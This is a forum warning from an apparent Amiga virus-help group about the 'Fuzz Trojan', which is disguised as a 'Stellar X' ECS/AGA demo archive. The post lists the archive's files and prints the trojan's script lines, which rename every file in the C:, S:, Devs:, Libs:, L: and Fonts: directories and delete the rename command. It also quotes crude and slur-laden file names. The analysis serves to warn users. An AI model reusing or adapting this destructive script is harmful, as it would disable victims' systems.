Jan Andersen Admin
Posts : 29 Join date : 2020-04-04 Location : Copenhagen, Denmark
| Subject: Fuzz Trojan (stellarx.lha) Sat Apr 11, 2020 5:46 am | |
| Fuzz Trojan is unknown to all Anti-Virus programs. TAKE CARE
Hi All.... 11 april 2020
We have just recived this archive. It is said to be a demo for ECS & AGA machines. But if you run this demo, your Amiga system will in C:, S:, Devs:, L; Libs:, will be renamed We are not really sure how old this trojan are but at this time there is NO ANTIVIRUS program that can find it. So watch out for it. Here is some info about the trojan: ------------------------------------------------------ Trojan name: Fuzz Trojan file: Many files do damage Trojan size: Many files Trojan archive: Stellarx.lha Archive size: 444.898 bytes Archive info: 'Stellar X' Demo - ECS & AGA Machines ------------------------------------------------------
There is an ReadMe.txt in the archive, with an add from a Canadian BBS, called 'Peace Courier Canadian HQ', saying use a 14.4 USR Dual modem. So we guess it must be an old trojan, there aint many BBS'es left
The trojan bomb is named 'Stellar X Demo'. When you start the Demo, it looks like this: Yo! Fuk-Dat-Boyee... UpTheAss Yo! Fuk-Diz-Boyee... >nil: -m6 Wigger! navel creditz
The FuZZ trojan archive contains many other files:
- BooYaKa (Script-File)
- BooYaka.info (Icon)
- DATA/Boyee (Rename Command)
- DATA/Yo! (Run Command)
- DATA/Fuk-Dat-Boyee... (CLI Show-Command Picture)
- DATA/navel (Execute Command)
- DATA/Fuk-Diz-Boyee... (Noiseplayer Music Player)
- DATA/Wigger! (Soundmodule)
- DATA/fuzzy (List Command)
- DATA/creditz (ScriptFile)
- DATA/Dude (Dir Command)
- DATA/BooYaKa (Script File)
- DATA/UpTheAss (Picture)
If you start the trojan, it executes the Script-File 'BooYaKa':
Where you can read this in the script: cd data execute booyaka
This means that the trojan will execute the file 'DATA/BooYaKa'. This file contains:
Yo! Fuk-Dat-Boyee... UpTheAss Yo! Fuk-Diz-Boyee... >nil: -m6 Wigger! navel creditz
Now the trojan displays the picture 'UpTheAss'. Then the module Wigger!. And executes the script-file creditz:
fuzzy >rank s: lformat "boyee %s%s s:%s.FuZZ" navel rank fuzzy >rank devs: lformat "boyee %s%s devs:%s.FuZZ" navel rank fuzzy >rank libs: lformat "boyee %s%s libs:%s.FuZZ" navel rank fuzzy >rank l: lformat "boyee %s%s l:%s.FuZZ" navel rank fuzzy >rank fonts: lformat "boyee %s%s fonts:%s.FuZZ" navel rank fuzzy >rank c: lformat "boyee %s%s c:%s.FuZZ" navel rank delete c:rename
Now the trojan will rename every file in: S: C: Fonts: Libs: L: Devs: And deletes the command c:rename
Fuzz Trojan is unknown to all Anti-Virus programs. TAKE CARE
Regards.... Jan Andersen Virus Help Denmark www.vht-dk.dk ------------------
| |
|